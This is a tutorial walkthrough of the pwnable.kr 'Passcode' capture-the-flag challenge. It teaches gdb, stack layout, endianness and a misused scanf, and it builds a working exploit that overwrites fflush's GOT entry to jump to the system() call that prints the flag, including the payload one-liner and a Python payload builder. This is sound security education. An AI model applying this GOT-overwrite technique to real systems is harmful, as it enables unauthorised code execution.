pwnable.kr (Passcode)

Tutorial Notes

What you’ll learn:

  • More sophisticated attacks into memory buffers
  • More sophisticated uses of gdb
  • Introduction to assembly code
  • Closer look at how data is stored in memory

Directions:

First visit pwnable.kr and click on the “Passcode” icon. Next we log in via ssh as per the instructions:

$ ssh passcode@pwnable.kr -p2222
passcode@pwnable.kr's password: 
 ____  __    __  ____    ____  ____   _        ___      __  _  ____  
|    \|  |__|  ||    \  /    ||    \ | |      /  _]    |  |/ ]|    \ 
|  o  )  |  |  ||  _  ||  o  ||  o  )| |     /  [_     |  ' / |  D  )
|   _/|  |  |  ||  |  ||     ||     || |___ |    _]    |    \ |    / 
|  |  |  `  '  ||  |  ||  _  ||  O  ||     ||   [_  __ |     \|    \ 
|  |   \      / |  |  ||  |  ||     ||     ||     ||  ||  .  ||  .  \
|__|    \_/\_/  |__|__||__|__||_____||_____||_____||__||__|\_||__|\_|
                                                                     
- Site admin : daehee87.kr@gmail.com
- IRC : irc.netgarage.org:6667 / #pwnable.kr
- Simply type "irssi" command to join IRC now
- files under /tmp can be erased anytime. make your directory under /tmp
- to use peda, issue `source /usr/share/peda/peda.py` in gdb terminal
passcode@ubuntu:~$ 

Next let’s orient ourselves: who are we? what’s in our directory:

passcode@ubuntu:~$ id
uid=1010(passcode) gid=1010(passcode) groups=1010(passcode)
passcode@ubuntu:~$ ls -l
total 16
-r--r----- 1 root passcode_pwn   48 Jun 26  2014 flag
-r-xr-sr-x 1 root passcode_pwn 7485 Jun 26  2014 passcode
-rw-r--r-- 1 root root          858 Jun 26  2014 passcode.c

Once again, the permissions for flag are such that only the owner (root) or group (passcode_pwn) can read it. We can see an executable file passcode that has curious permissions:

-r-xr-sr-x 1 root passcode_pwn 7485 Jun 26  2014 passcode

This looks similar to the suid (set user id on execute) permission from the Collision challenge, except the s is in the group field. This is the sgid or “set group id on execute” permission. When passcode is run, it will take on group passcode_pwn. So if we run passcode, it will have the necessary privilege to read the flag. Now all we need to do is figure out how to get it to read the flag.
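The permission string can also be decoded with Python's standard stat module. This is only a small sketch, written for Python 3 (the interpreter shown on the server later in these notes is Python 2.7). The octal mode 0o2555 is an assumption reconstructed from the -r-xr-sr-x string in the listing, not a value read from the real file.

```python
import stat

# Assumed mode: regular file, setgid bit (0o2000), r-xr-xr-x (0o555).
mode = stat.S_IFREG | 0o2555

permission_string = stat.filemode(mode)   # same notation that ls -l uses
has_setgid = bool(mode & stat.S_ISGID)    # the "s" in the group field
has_setuid = bool(mode & stat.S_ISUID)    # would be an "s" in the owner field

print(permission_string)
print("setgid:", has_setgid, "setuid:", has_setuid)
```

The s in the group triplet corresponds to the S_ISGID bit, while the owner triplet has a plain x, so only the group id changes when the program runs.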

Let’s have a look at the passcode.c file:

#include <stdio.h>
#include <stdlib.h>

void login(){
	int passcode1;
	int passcode2;

	printf("enter passcode1 : ");
	scanf("%d", passcode1);
	fflush(stdin);

	// ha! mommy told me that 32bit is vulnerable to bruteforcing :)
	printf("enter passcode2 : ");
        scanf("%d", passcode2);

	printf("checking...\n");
	if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
		exit(0);
        }
}

void welcome(){
	char name[100];
	printf("enter you name : ");
	scanf("%100s", name);
	printf("Welcome %s!\n", name);
}

int main(){
	printf("Toddler's Secure Login System 1.0 beta.\n");

	welcome();
	login();

	// something after login...
	printf("Now I can safely trust you that you have credential :)\n");
	return 0;	
}

Let’s start in the main() function. It calls two functions, welcome() and login(), and then prints a success message. Looking at welcome() doesn’t seem to reveal much: there’s simple code for you to enter your name, and print it back. In login() we see a couple of places to enter a passcode, and then an if statement checking whether these passcodes equal some predetermined values. If so, the program will print the flag, otherwise the program will exit.

So what’s our strategy? Well, we could try to approach it the same as with the bof challenge: overrun the bounds of the name array in the welcome() function, and see if we can use this to rewrite the passcode1 and passcode2 variables in the login() function.

As before, it seems like it might be a good strategy to compile our own passcode binary with debugging information present. First let’s check:

passcode@ubuntu:~$ file passcode
passcode: setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=d2b7bd64f70e46b1b0eb7036b35b24a651c3666b, not stripped

Again we see it’s a 32-bit binary. As before we can create and work out of a temp directory and compile our own version:

passcode@ubuntu:~$ mkdir /tmp/mypasscode && cp passcode.c /tmp/mypasscode && cd /tmp/mypasscode
passcode@ubuntu:/tmp/mypasscode$ gcc -g -m32 passcode.c -o passcode
passcode.c: In function ‘login’:
passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
  scanf("%d", passcode1);
        ^
passcode.c:14:15: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
         scanf("%d", passcode2);
               ^
passcode@ubuntu:/tmp/mypasscode$ 

Again we see compiler warnings. This could be useful. Let’s make a mental note and revisit this later.

Debugging passcode

Let’s start by running gdb and setting some breakpoints:

passcode@ubuntu:/tmp/mypasscode$ gdb passcode 
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.04) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from passcode...done.
(gdb) 

If we run list 0 it will print out the source code with corresponding line numbers. Let’s set up some breakpoints, shall we? First let’s set a breakpoint that lets us examine the contents of name after it has been written to (line 31), and a second one at the if statement in login() (line 17):

(gdb) break 31
Breakpoint 1 at 0x804868d: file passcode.c, line 31.
(gdb) break 17
Breakpoint 2 at 0x8048608: file passcode.c, line 17.

Ok let’s run the program.

(gdb) run
Starting program: /tmp/mypasscode/passcode 
Toddler's Secure Login System 1.0 beta.
enter you name : abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890

Breakpoint 1, welcome () at passcode.c:31
31		printf("Welcome %s!\n", name);
(gdb) print name
$1 = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890\000\000\000\000\000`m\374\367(\334\377\377\340\336\376\367+`\347\367\000\000\000\000\000`\374\367\000`\374\367(\334\377\377"

Understanding how memory is laid out

Ok so we can see the 100 character array partially filled up with our input. But here’s a question: where is the name buffer stored in memory? Well we can find out by printing the address of name as follows:

(gdb) print &name
$2 = (char (*)[100]) 0xffffdba8

Ok, so name begins at address 0xffffdba8 and goes for 100 bytes. But here’s the next question: which direction does name get written? Well let’s find out! First let’s print the contents of the memory address 0xffffdba8. How should we do that? First, take a look at this article on examining memory addresses and data in gdb. We’ll use the x command (i.e., “examine”) to print 100 characters starting at 0xffffdba8:

(gdb) x/100c 0xffffdba8
0xffffdba8:	97 'a'	98 'b'	99 'c'	100 'd'	101 'e'	102 'f'	103 'g'	104 'h'
0xffffdbb0:	105 'i'	106 'j'	107 'k'	108 'l'	109 'm'	110 'n'	111 'o'	112 'p'
0xffffdbb8:	113 'q'	114 'r'	115 's'	116 't'	117 'u'	118 'v'	119 'w'	120 'x'
0xffffdbc0:	121 'y'	122 'z'	65 'A'	66 'B'	67 'C'	68 'D'	69 'E'	70 'F'
0xffffdbc8:	71 'G'	72 'H'	73 'I'	74 'J'	75 'K'	76 'L'	77 'M'	78 'N'
0xffffdbd0:	79 'O'	80 'P'	81 'Q'	82 'R'	83 'S'	84 'T'	85 'U'	86 'V'
0xffffdbd8:	87 'W'	88 'X'	89 'Y'	90 'Z'	48 '0'	49 '1'	50 '2'	51 '3'
0xffffdbe0:	52 '4'	53 '5'	54 '6'	55 '7'	56 '8'	57 '9'	48 '0'	0 '\000'
0xffffdbe8:	0 '\000'	0 '\000'	0 '\000'	0 '\000'	96 '`'	109 'm'	-4 '\374'	-9 '\367'
0xffffdbf0:	40 '('	-36 '\334'	-1 '\377'	-1 '\377'	-32 '\340'	-34 '\336'	-2 '\376'	-9 '\367'
0xffffdbf8:	43 '+'	96 '`'	-25 '\347'	-9 '\367'	0 '\000'	0 '\000'	0 '\000'	0 '\000'
0xffffdc00:	0 '\000'	96 '`'	-4 '\374'	-9 '\367'	0 '\000'	96 '`'	-4 '\374'	-9 '\367'
0xffffdc08:	40 '('	-36 '\334'	-1 '\377'	-1 '\377'

So from this we can see that the name buffer grows upward in memory, i.e., each successive byte is stored at the next larger memory address. This means that if name[0] is stored in address 0xffffdba8, then name[99] is stored in address 0xffffdba8 + 99 = 0xffffdc0b.

If you’d like to do arithmetic in hexadecimal, you can do it easily with Python:

passcode@ubuntu:/tmp/mypasscode$ python
Python 2.7.12 (default, Jul  1 2016, 15:12:24) 
[GCC 5.4.0 20160609] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> x = int("ffffdba8",16) + 99
>>> print hex(x)
0xffffdc0b

So now we have a clear picture how name[] is laid out in memory:

Memory address  Contents           Write Direction
--------------  --------           ---------------
...             ...
0xffffdc0d      <something else>
0xffffdc0c      <something else>      (High)
0xffffdc0b      name[99]                ^
0xffffdc0a      name[98]               / \
0xffffdc09      name[97]                |
0xffffdc08      name[96]                |
...             ...                     |
0xffffdbab      name[3]                 |
0xffffdbaa      name[2]                 |
0xffffdba9      name[1]                 |
0xffffdba8      name[0]                 |
0xffffdba7      <something else>      (Low)
0xffffdba6      <something else>
...             ...

If you’d like a little memory aid to help you remember, think of the word “writeup.” That is, data is written upwards in memory.

Storing Integers as Little Endian

Character arrays are stored in memory in a straightforward way: each successive character occupies the next higher memory address. But what about integers? The architecture the passcode program runs on (32-bit Intel x86) is little endian, meaning the “little end” (i.e., low byte) of the integer gets stored first.

Here’s an illustration of “big end” vs. “little end.”

Decimal 305419896 is hex 0x12345678

Represented as bytes:

  The "big end"     The "little end"
  ^                 ^
  |                 |
0x12, 0x34, 0x56, 0x78

If an architecture is little endian, the little end gets stored first:

0x12, 0x34, 0x56, 0x78
  ^     ^     ^     ^
  |     |     |     | This byte stored 1st
  |     |     | This byte stored 2nd
  |     | This byte stored 3rd
  | This byte stored 4th

The data is still written in an upward direction (i.e., to successively larger addresses). So the first byte gets stored at address n, the second byte at the next higher address n+1, and so on.

We can try this out. Let’s load the integer 0x12345678 into memory starting at address 0xffffdba8:

(gdb) set {int}0xffffdba8 = 0x12345678

Now let’s examine the memory:

(gdb) x/x 0xffffdba8
0xffffdba8:	0x78
(gdb) x/x 0xffffdba9
0xffffdba9:	0x56
(gdb) x/x 0xffffdbaa
0xffffdbaa:	0x34
(gdb) x/x 0xffffdbab
0xffffdbab:	0x12

So just to visualize this a bit better, the integer 0x12345678 gets stored in memory like this:

Memory address      Contents
--------------      --------
...                 ...
0xffffdbac          <something else>
0xffffdbab          0x12
0xffffdbaa          0x34
0xffffdba9          0x56
0xffffdba8          0x78
0xffffdba7          <something else>
...          	    ...

So what? Well recall that when we’re writing bytes into a buffer, we’re writing from low to high. So if we wanted to write the integer 0x12345678 into memory we’d need to take the little endian-ness into account and order the byte array accordingly:

0x78, 0x56, 0x34, 0x12
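Python's standard struct module can do this byte ordering for us. The following is a minimal sketch in Python 3 (on the Python 2.7 interpreter shown earlier, iterating over the packed string yields characters rather than integers, so the list comprehension would need ord()).

```python
import struct

value = 0x12345678

# "<I" = little-endian unsigned 32-bit, ">I" = big-endian unsigned 32-bit.
little = struct.pack("<I", value)
big = struct.pack(">I", value)

little_bytes = [hex(b) for b in little]
big_bytes = [hex(b) for b in big]
print("little endian:", little_bytes)
print("big endian:   ", big_bytes)

# Unpacking with the same format recovers the original integer.
round_trip = struct.unpack("<I", little)[0]
print(hex(round_trip))
```

The little-endian list is the order in which the bytes have to appear in our input if they are to be read back as the integer 0x12345678.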

Debugging the login() function

Let’s set a new break point in the login() function to see where the passcode1 and passcode2 variables are stored in memory. We can set a breakpoint right at the start of the login() function and then check their memory addresses:

(gdb) break 8
Breakpoint 1 at 0x80485a1: file passcode.c, line 8.
(gdb) run
Starting program: /tmp/mypasscode/passcode 
Toddler's Secure Login System 1.0 beta.
enter you name : abc123
Welcome abc123!

Breakpoint 1, login () at passcode.c:8
8		printf("enter passcode1 : ");
(gdb) print &passcode1
$1 = (int *) 0xffffdc08
(gdb) print &passcode2
$2 = (int *) 0xffffdc0c
(gdb) 

Well this is interesting. Notice passcode1 begins at 0xffffdc08. Since it’s an integer, it occupies 4 bytes growing upward in memory, i.e.,

Memory address		Contents
--------------		-------
0xffffdc0b 		passcode1 (most significant byte)
0xffffdc0a 		passcode1
0xffffdc09 		passcode1
0xffffdc08 		passcode1 (least significant byte)

But now recall back to our analysis of the name buffer in the welcome() function:

Memory address		Contents
--------------		-------
0xffffdc0b 		name[99]
0xffffdc0a 		name[98]
0xffffdc09 		name[97]
0xffffdc08 		name[96]

Interesting! The last 4 bytes of name overlap with passcode1.

Huh? How does that work? Well name and passcode1 are local variables living in two separate functions. Local variables are only allocated when the function is called. So by the time passcode1 is allocated, the name variable is no longer being used, and passcode1 essentially by coincidence got allocated to a region of memory that name had used previously.
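The overlap can be double-checked with a little arithmetic on the addresses gdb printed. This is a sketch in Python 3; the constants are the values from the gdb sessions above (on our own build), and the helper name overlap_bytes is made up for illustration.

```python
NAME_ADDR = 0xffffdba8        # from: print &name
NAME_SIZE = 100               # char name[100]
PASSCODE1_ADDR = 0xffffdc08   # from: print &passcode1
PASSCODE2_ADDR = 0xffffdc0c   # from: print &passcode2
INT_SIZE = 4


def overlap_bytes(start_a, size_a, start_b, size_b):
    """Number of addresses shared by two ranges [start, start + size)."""
    low = max(start_a, start_b)
    high = min(start_a + size_a, start_b + size_b)
    return max(0, high - low)


offset_of_passcode1 = PASSCODE1_ADDR - NAME_ADDR
overlap1 = overlap_bytes(NAME_ADDR, NAME_SIZE, PASSCODE1_ADDR, INT_SIZE)
overlap2 = overlap_bytes(NAME_ADDR, NAME_SIZE, PASSCODE2_ADDR, INT_SIZE)

print("passcode1 starts at name[%d]" % offset_of_passcode1)
print("bytes shared with passcode1:", overlap1)
print("bytes shared with passcode2:", overlap2)
```

So passcode1 sits exactly on name[96] through name[99], while passcode2 begins just past the end of the 100-byte array.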

So here’s another question: if we set the addresses 0xffffdc08-0b during the welcome() function, would those values still be there when the login function is called? Well let’s check. Let’s try entering a name consisting of 96 “.”s followed by “ABCD”. Then we’ll examine the contents of passcode1 using x/c, which tells gdb to print the memory contents as characters:

(gdb) run
Starting program: /tmp/mypasscode/passcode 
Toddler's Secure Login System 1.0 beta.
enter you name : ................................................................................................ABCD
Welcome ................................................................................................ABCD!

Breakpoint 2, login () at passcode.c:8
8		printf("enter passcode1 : ");
(gdb) x/c 0xffffdc08
0xffffdc08:	65 'A'
(gdb) x/c 0xffffdc09
0xffffdc09:	66 'B'
(gdb) x/c 0xffffdc0a
0xffffdc0a:	67 'C'
(gdb) x/c 0xffffdc0b
0xffffdc0b:	68 'D'
(gdb) 

Bingo! We can control the contents of passcode1 at the time the login() function is called.

The mistake here (well, one of the mistakes) is the programmer didn’t initialize passcode1, so whatever was living in memory from before just gets left there. Ok, this will be useful.

That Compiler Warning about scanf()

Recall that when we compiled the program, we received this compiler warning:

passcode.c:9:8: warning: format ‘%d’ expects argument of type ‘int *’, but argument 2 has type ‘int’ [-Wformat=]
  scanf("%d", passcode1);

Let’s go look up what’s going on here. The scanf() function is accepting input from standard in. To understand this, you need to understand a bit about how pointers work.

First let’s see an example of how scanf reads an integer from standard in:

scanf ("%d", <address>)

The scanf tells the program to read bytes from standard input, interpret them in some specified format, and then store them somewhere in memory.

The %d tells the program to interpret the input as a signed integer, i.e., read an ASCII numeric value from standard in, interpret it as a 4 byte integer, and store it at the address specified by <address>.

Using scanf properly

So how do you specify an address? Well first we would allocate an integer in memory, and then point scanf to that location. Here’s an example of how to do it properly:

int i;
printf ("Enter your age: ");
scanf ("%d", &i);

The &i tells the program to look up the memory address of integer i using the address-of operator &, and scanf then writes the resulting 4-byte integer to memory beginning at that address.

Using scanf improperly

Look what happens in login(), however:

printf("enter passcode1 : ");
scanf("%d", passcode1);

The programmer has made a mistake. Recall scanf() will write the input to whatever address you give it. The correct action would be to look up the address of passcode1 using &passcode1, i.e.,

scanf("%d", &passcode1);

But the programmer forgot the address-of operator. So instead of giving scanf the location of passcode1, the program gives it the contents of passcode1!

But scanf is a dumb function… it’s going to write to whatever address you give it, so it’s going to treat the contents of passcode1 as the address to write to!

So as the attacker, if we could set the content of passcode1, we could make the program write an integer anywhere we want!
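To make the difference concrete, here is a toy model in Python 3. It is not how scanf is implemented; ToyMemory and toy_scanf_d are hypothetical names invented for this sketch, and memory is just a dictionary from address to byte. The leftover value 0x44434241 is what the bytes 'A', 'B', 'C', 'D' from the earlier experiment look like when read as a little-endian integer.

```python
import struct


class ToyMemory:
    """A tiny byte-addressable memory (illustration only)."""

    def __init__(self):
        self.cells = {}  # address -> byte value

    def write_u32(self, address, value):
        # Store a 32-bit value little-endian, one byte per address.
        packed = struct.pack("<I", value & 0xFFFFFFFF)
        for offset, byte in enumerate(packed):
            self.cells[address + offset] = byte

    def read_u32(self, address):
        raw = bytes(self.cells.get(address + i, 0) for i in range(4))
        return struct.unpack("<I", raw)[0]


def toy_scanf_d(memory, destination, typed_text):
    """Mimic scanf("%d", destination): parse decimal text, store it there."""
    memory.write_u32(destination, int(typed_text))


PASSCODE1_ADDR = 0xffffdc08
LEFTOVER = 0x44434241  # "ABCD" left behind by name[96..99]

# Correct call, scanf("%d", &passcode1): the address of the variable is passed.
correct = ToyMemory()
correct.write_u32(PASSCODE1_ADDR, LEFTOVER)
toy_scanf_d(correct, PASSCODE1_ADDR, "338150")

# Buggy call, scanf("%d", passcode1): the current contents are passed instead.
buggy = ToyMemory()
buggy.write_u32(PASSCODE1_ADDR, LEFTOVER)
toy_scanf_d(buggy, buggy.read_u32(PASSCODE1_ADDR), "338150")

print(correct.read_u32(PASSCODE1_ADDR))     # the typed number
print(hex(buggy.read_u32(PASSCODE1_ADDR)))  # still the leftover bytes
print(buggy.read_u32(LEFTOVER))             # the number landed over here
```

In the buggy case passcode1 never changes; the typed number ends up at whatever address the leftover bytes happen to spell. In the real program 0x44434241 is unlikely to be writable, so the write would most likely crash, which is why the choice of leftover value matters.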

In summary

So to summarize what we have so far:

  • The name buffer overlaps with passcode1, allowing us to write into passcode1
  • The programmer forgot to initialize passcode1, allowing us to control the contents of passcode1
  • The programmer improperly instructs scanf to store bytes from standard input into the address pointed to by the contents of passcode1

Since we control the contents of passcode1 we can write an integer into any memory location we want (well.. with some constraints).

Hijacking a function call

Question: if you could write 4 bytes anywhere in memory, where would you write? What would you write? Well recall 4 bytes is enough to specify a memory address. So the “what” could be an address.

The next piece of the puzzle is to understand what happens when a function gets called. There’s a fair bit of detail here, but we’ll just skip to the part that’s relevant to us: when a function is called, the program has to jump to a location in memory containing the function’s code. That means a function call must specify an address to jump to. So if we could overwrite that address, we could cause the program to jump to anywhere we want and continue executing!

So what if we just jumped straight to the call to system(), bypassing the if statement altogether? Let’s take a look.

For this we can use the disassemble command in gdb to disassemble the login function and see which memory addresses are associated with the various operations:

(gdb) disassemble login
Dump of assembler code for function login:
   0x0804859b <+0>:	push   %ebp
   .
   .
   .
   0x0804862d <+146>:	push   $0x80487bf
   0x08048632 <+151>:	call   0x8048450 <system@plt>
   .
   .
   .

So if we could somehow cause the program to jump to address 0x0804862d, the next instruction to be executed would be the system call that would print the flag!

So which function call shall we hijack? Returning to the code, the operation immediately after the scanf is a function called fflush:

	printf("enter passcode1 : ");
	scanf("%d", passcode1);
	fflush(stdin);

So we could use the scanf to overwrite the address pointing to the start of the fflush code, causing the program to jump to the system call instead. Let’s disassemble fflush and see. Note the program should not be running (i.e., not even paused at a breakpoint) when you do this:

(gdb) disassemble fflush
Dump of assembler code for function fflush@plt:
   0x08048420 <+0>:	jmp    *0x804a010
   0x08048426 <+6>:	push   $0x8
   0x0804842b <+11>:	jmp    0x8048400
End of assembler dump.

So the first instruction is jmp *0x804a010. The jmp instruction tells the program to jump to an address to continue execution. In this case the program will jump to the location of the fflush code and execute it.

So which address does it jump to? The “*” is the indirection operator: *0x804a010 is read as “the address stored at 0x804a010”. In other words, go grab the 4 bytes stored in memory at addresses 0x804a010-0x804a013, and then jump to the address they spell out.

Ok, now we got it. We need to overwrite the contents in addresses 0x804a010-0x804a013 with the address of the system call. When the program loads the address to run the fflush code, it will instead load the address of the system call, and jump to that instead.
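The indirect jump can be pictured with a toy model in Python 3. Everything here is a simplification for illustration: the dictionaries slots and code_at, the helper call_fflush, and the address HYPOTHETICAL_LIBC_FFLUSH are invented for this sketch (the real location of fflush is not shown anywhere in these notes), and the model ignores how the slot gets filled in the first place.

```python
FFLUSH_SLOT = 0x0804a010               # from: jmp *0x804a010
SYSTEM_CALL_SITE = 0x0804862d          # from: disassemble login
HYPOTHETICAL_LIBC_FFLUSH = 0xf7e60000  # made-up address, illustration only


def fflush_body():
    return "fflush ran"


def cat_flag():
    return "system(\"/bin/cat flag\") ran"


# Which code lives at which address (toy stand-in for executable memory).
code_at = {
    HYPOTHETICAL_LIBC_FFLUSH: fflush_body,
    SYSTEM_CALL_SITE: cat_flag,
}

# The 4-byte slot that the jmp instruction reads its destination from.
slots = {FFLUSH_SLOT: HYPOTHETICAL_LIBC_FFLUSH}


def call_fflush():
    """Mimic jmp *0x804a010: load the address from the slot, then go there."""
    target = slots[FFLUSH_SLOT]
    return code_at[target]()


before = call_fflush()
slots[FFLUSH_SLOT] = SYSTEM_CALL_SITE  # what the buggy scanf lets us do
after = call_fflush()

print(before)
print(after)
```

The call site never changes. Only the 4 bytes in the slot change, and that is enough to redirect every later call to fflush.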

Recall the system call happens at address 0x0804862d, so our goal is to write the following contents to memory (remember the value is stored little endian, low byte first):

Memory address		Contents
--------------		-------
0x804a013		0x08
0x804a012 		0x04
0x804a011 		0x86
0x804a010 		0x2d
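The byte placement can be double-checked with struct. This is a short Python 3 sketch that uses the two addresses from our own build; the dictionary name layout is just for illustration.

```python
import struct

SLOT = 0x0804a010     # where the 4 bytes must be written
TARGET = 0x0804862d   # the address we want the program to jump to

# Little endian: the lowest address receives the least significant byte.
layout = {SLOT + i: byte for i, byte in enumerate(struct.pack("<I", TARGET))}

for address in sorted(layout, reverse=True):
    print("0x%07x    0x%02x" % (address, layout[address]))
```

We never have to place these bytes by hand, though: scanf("%d") stores the integer for us, so we only need to type the target address as a decimal number.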

In Summary

When the program calls fflush, it goes and grabs the 4 bytes starting at 0x804a010. Normally this would cause the program to jump to the location of the fflush instructions. But we’ve rewritten the memory contents to the address of the system call. So when the program tries to jump to the fflush instructions, it will jump to the system call instead, which will print the flag.

Putting it all together

In summary we have 3 parts to our exploit:

  1. Filling the buffer enough to write into passcode1
  2. Filling passcode1 with the value 0x804a010 so scanf will store input to that address
  3. Filling address 0x804a010 with the address 0x0804862d so the fflush will jump to the system call printing the flag.

So as input into the program we need:

  1. 96 characters of filler (the content doesn’t matter). Just enough bytes so we can set the last 4 bytes. Python makes it easy to generate a string of 96 characters:
96 * '.'
  2. The address into which we can store the address to be jumped to, i.e., 0x0804a010, written as the bytes 0x10, 0xa0, 0x04, 0x08 in little-endian order. In Python this would be:
\x10\xa0\x04\x08
  3. The address to jump to, i.e. 0x0804862d. This value however must be delivered as an ASCII encoded decimal number, since the scanf() function is expecting the user to type it in. Let’s convert 0x0804862d to decimal. Using the Python interpreter we get:
>>> int("0804862d",16)
134514221

Putting this all together we have the Python command:

print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'

Ok, let’s input this into passcode:

passcode@ubuntu:/tmp/mypasscode$ python -c "print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'" | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome ................................................................................................!
/bin/cat: flag: No such file or directory
enter passcode1 : Now I can safely trust you that you have credential :)

It worked! But it didn’t print the flag (it says No such file or directory). That’s because we ran it on the version in /tmp/mypasscode. Now we need to run it on the real version in /home/passcode:

passcode@ubuntu:~$ cd /home/passcode
passcode@ubuntu:~$ python -c "print 96 * '.' + '\x10\xa0\x04\x08' + '134514221'" | ./passcode
Toddler's Secure Login System 1.0 beta.
enter you name : Welcome ................................................................................................!
enter passcode1 : enter passcode2 : checking...
Login Failed!

Hmm. This time it didn’t work. The specific memory addresses for the fflush call and the system call must be different in the real binary than in the one we compiled ourselves.

GOAL: Your job is to disassemble the real passcode file and figure out what the correct addresses are, and then capture the flag!
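Since the addresses are the only things that change, it may help to build the payload from parameters. Below is a sketch in Python 3; build_payload is a name made up for this example, and the two addresses in the main block are the ones from our own build in /tmp/mypasscode, so they are placeholders to be replaced with whatever you find in the real binary. Note that in Python 3 a plain print of '\x10\xa0\x04\x08' would typically encode the \xa0 character as two bytes, so the sketch writes raw bytes to sys.stdout.buffer instead.

```python
import struct
import sys


def build_payload(slot_address, jump_target, filler_length=96):
    """Return the bytes to feed passcode on standard input.

    slot_address: where scanf should store our number (ends up in passcode1)
    jump_target:  the address we want stored in that slot
    """
    filler = b"." * filler_length                    # name[0..95]
    slot_bytes = struct.pack("<I", slot_address)     # name[96..99], little endian
    typed_number = str(jump_target).encode("ascii")  # what scanf("%d") parses
    return filler + slot_bytes + typed_number + b"\n"


if __name__ == "__main__":
    # Placeholder addresses from our own build; the real binary will differ.
    payload = build_payload(0x0804a010, 0x0804862d)
    sys.stdout.buffer.write(payload)
```

Saved under a name of your choosing in your /tmp directory, the script's output could be piped into ./passcode in the same way as the one-liner above, assuming a Python 3 interpreter is available on the machine.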